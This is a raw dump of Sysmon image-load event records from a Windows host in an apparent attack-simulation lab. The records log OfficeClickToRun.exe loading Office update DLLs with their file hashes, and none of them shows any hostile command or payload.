23542300x800000000000000071303Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-synch-l1-2-0.dllMD5=F6B4D8D403D22EB87A60BF6E4A3E7041,SHA256=25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071302Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-processthreads-l1-1-1.dllMD5=C2EAD5FCCE95A04D31810768A3D44D57,SHA256=42A9A3D8A4A7C82CB6EC42C62D3A522DAA95BEB01ECB776AAC2BFD4AA1E58D62,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071301Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-localization-l1-2-0.dllMD5=3B9D034CA8A0345BC8F248927A86BF22,SHA256=A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071300Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-file-l2-1-0.dllMD5=BFB08FB09E8D68673F2F0213C59E2B97,SHA256=6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071299Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\api-ms-win-core-file-l1-2-0.dllMD5=F6D1216E974FB76585FD350EBDC30648,SHA256=348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071298Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ai.dllMD5=2DDC36B67726AA825707966B44E86973,SHA256=64920DE0C26BAFCDF93AFF1C0B390E1D99AD22650FBC9F53562B10CD55E4ABD4,IMPHASH=24143AC407FDCBC5258F2920FD9722C3truetrue 23542300x800000000000000071297Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ADALPREVIOUS.DLLMD5=CFE36E1D979B6632B6FFB63B939E285D,SHA256=75D0245750AD87CCE7FD55B752AB98767F592B2B51B1892261F62123580159F1,IMPHASH=D7A269B1FE8B9BF5EA479AC319C60163truetrue 23542300x800000000000000071296Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.313{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\ADAL.DLLMD5=7A5028F5E646DBA429C624F3FC14C379,SHA256=6EBC149CB6667E68126E5550C6349C4750FB36B60E517448E0FA389D8B7BDEC1,IMPHASH=E4D8786075C493F9B33E075B460E1C6Ctruetrue 23542300x800000000000000071295Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\en-us\oregres.dll.muiMD5=3F0942DB15FD5DEAB54350B287F287A5,SHA256=8670ED34C50DBA6931F85A73D140FC2854BBCE7D0A26E5259F3231E796FFC396,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071294Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Cultures\OFFICE.ODFMD5=FB95E3D98E7B7365B25B08B9271CE754,SHA256=3B1EA91F8D762DEDD32B16E6F6859FF7CB7B225609C5C956BD8C756E1739E198,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071293Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.266{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\msointl30.dllMD5=92B0B6D685FE64F936B2F1F562454BF5,SHA256=18FB6D28F6C83786C13E9322D0304B3D72F09D59C33DE0DB6440E276BB8D2BF2,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071292Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.266{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\1033\MSOINTL.DLLMD5=E05F2AFAA37E0563BBAF6A10FB1E1D94,SHA256=8FD5EF5ED71C95D141C7CF14379737F457EAE197F54FA2F669C55242D55A7155,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\vcruntime140.dllMD5=E51018E4985943C51FF91471F8906504,SHA256=FF9C1123CFF493A8F5EACB91115611B6C1C808B30C82AF9B6F388C0EF1F6B46D,IMPHASH=DBF59B100B5A77256457CF057352B441truetrue 23542300x800000000000000071290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\vccorlib140.dllMD5=E88E2BF24A4D846C7F8E313D75EED528,SHA256=2F7E17BC746ABF55122EE1D2608DB7240DE4B4428BE13DFEE8C3E03DB6F9B360,IMPHASH=E2C243EAA5D873A145FCEF834080DE02truetrue 23542300x800000000000000071289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.235{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\ucrtbase.dllMD5=21E6732EF4EF91B8EFE2F17AD0562093,SHA256=EF2A371EDB8835629DE7A839F5B5D61C554C9E307CC4BF05CD9634817C0914F2,IMPHASH=71F1D8A10F840FFEE6964317E974D463truetrue 23542300x800000000000000071288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.220{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\msvcr120.dllMD5=1A22AC29230FF06E278CF85992F48C86,SHA256=3A3F61F1D187142BBA9B37B318F6052A09743FF24FCDB3CEE478D1BC5C68D300,IMPHASH=AA8D086DEB6960B10F8791DF466A5610truetrue 23542300x800000000000000071287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.204{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\msvcp140.dllMD5=5FD0772C30A923159055E87395F96D86,SHA256=02C7259456EAC8CBADFB460377BA68E98282400C7A4A9D0BF49B3313EF6D554D,IMPHASH=F2D585FF96AFA3A77E09F5B37E7B3230truetrue 23542300x800000000000000071286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\msvcp120.dllMD5=E3244FDCEC84C99E4B60227EB3B70893,SHA256=81FBC2824E73F0D101D91854694A52E79DB0FFAADBB2A10DEAAF47B3B7F9B2B0,IMPHASH=6CCDA270A497A2C5A36A7F385CC9910Dtruetrue 23542300x800000000000000071285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.188{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\mfc140u.dllMD5=F8EBBB4C28AB643471B124701DA5B71A,SHA256=DF8543E39C6C04440734A26B25A8ADB34460D4AD08FD41E2468F067F1284E582,IMPHASH=C2C401022BB95036E7638802C8DA49BDtruetrue 23542300x800000000000000071284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\concrt140.dllMD5=773091E3923378F9B529CDA45E32C489,SHA256=6CC8FA5CE54B2B8C99E22A0E37179EBA9D418568D142AC58FAD52DD28E867A17,IMPHASH=720042EA97BFDE1DFC328C5715BE448Dtruetrue 23542300x800000000000000071283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-utility-l1-1-0.dllMD5=D6ABF5C056D80592F8E2439E195D61AC,SHA256=8858D883D180CEA63E3BF4A3F5BC9E0F9FA16C9A35A84C4EFE65308CEA13A364,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-time-l1-1-0.dllMD5=1FA7C2B81CDFD7ACE42A2A9A0781C946,SHA256=CAFDB772A1D7ACF0807478FDBA1E00FD101FC29C136547B37131F80D21DACFFD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.126{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-string-l1-1-0.dllMD5=5E72659B38A2977984BBC23ED274F007,SHA256=44A4DB6080F6BDAE6151F60AE5DC420FAA3BE50902E88F8F14AD457DEC3FE4EA,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-stdio-l1-1-0.dllMD5=32D7B95B1BCE23DB9FBD0578053BA87F,SHA256=104A76B41CBD9A945DBA43A6FFA8C6DE99DB2105D4CE93A717729A9BD020F728,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-runtime-l1-1-0.dllMD5=AE3FA6BF777B0429B825FB6B028F8A48,SHA256=66B86ED0867FE22E80B9B737F3EE428BE71F5E98D36F774ABBF92E3AACA71BFB,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-process-l1-1-0.dllMD5=8F8A47617DFD829A63E3EC4AFF2718D9,SHA256=6D4A1AAD695A3451C2D3F564C7CC8D37192CD35539874DF6AE55E24847E51784,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-private-l1-1-0.dllMD5=1DD5666125B8734E92B1041139FA6C37,SHA256=D0FF5F6BB94961D4C17F0709297A6B5A5FA323C9AC82F4FE27187912B4B13CF3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-multibyte-l1-1-0.dllMD5=809BC1010EAF714CD095189AF236CE2F,SHA256=B52F2B9DE19D12B0E727E13E3DDE93009E487BFB2DD97FD23952C7080949D97E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-math-l1-1-0.dllMD5=D0D380AF839124368A96D6AA82C7C8AE,SHA256=06985D00BF4985024E95442702BBDB53C2127E99F16440424F3380A88883F1A5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-locale-l1-1-0.dllMD5=E70D8FE9D21841202B4FD1CF55D37AC5,SHA256=E087F611B3659151DFB674728202944A7C0FE71710F280840E00A5C4B640632D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-heap-l1-1-0.dllMD5=39D81596A7308E978D67AD6FDCCDD331,SHA256=3D109FD01F6684414D8A1D0D2F5E6C5B4E24DE952A0695884744A6CBD44A8EC7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-filesystem-l1-1-0.dllMD5=AB8734C2328A46E7E9583BEFEB7085A2,SHA256=921B7CF74744C4336F976DB6750921B2A0960E8AA11268457F5ED27C0E13B2C8,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.110{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-environment-l1-1-0.dllMD5=45C54A21261180410091CEFB23F6A5AE,SHA256=2B0FEA07DB507B7266346EAB3CA7EDE3821876AADC519DAF059B130B85640918,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-convert-l1-1-0.dllMD5=5245F303E96166B8E625DD0A97E2D66A,SHA256=90A63611D9169A8CD7D030CD2B107B6E290E50E2BEBA6FA640A7497A8599AFF5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-crt-conio-l1-1-0.dllMD5=3B038338C1EB179D8EEE3883CF42BC3E,SHA256=C17786E9031062F56E4B205F394A795E11EF9367B922763DDF391F2ACAB2E979,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-xstate-l2-1-0.dllMD5=E20C50CB320A5718AE869D8EC4D460CA,SHA256=48C776F38EAED72CB05A993484F60CBFDF5AF59AEBC48E53481A997AE7DED8DC,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-timezone-l1-1-0.dllMD5=A20084F41B3F1C549D6625C790B72268,SHA256=0FA42237FD1140FD125C6EDB728D4C70AD0276C72FA96C2FAABF7F429FA7E8F1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-synch-l1-2-0.dllMD5=F6B4D8D403D22EB87A60BF6E4A3E7041,SHA256=25687E95B65D0521F8C737DF301BF90DB8940E1C0758BB6EA5C217CF7D2F2270,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-processthreads-l1-1-1.dllMD5=C2EAD5FCCE95A04D31810768A3D44D57,SHA256=42A9A3D8A4A7C82CB6EC42C62D3A522DAA95BEB01ECB776AAC2BFD4AA1E58D62,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-localization-l1-2-0.dllMD5=3B9D034CA8A0345BC8F248927A86BF22,SHA256=A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Filters\api-ms-win-core-file-l2-1-0.dllMD5=BFB08FB09E8D68673F2F0213C59E2B97,SHA256=6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:47.095{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 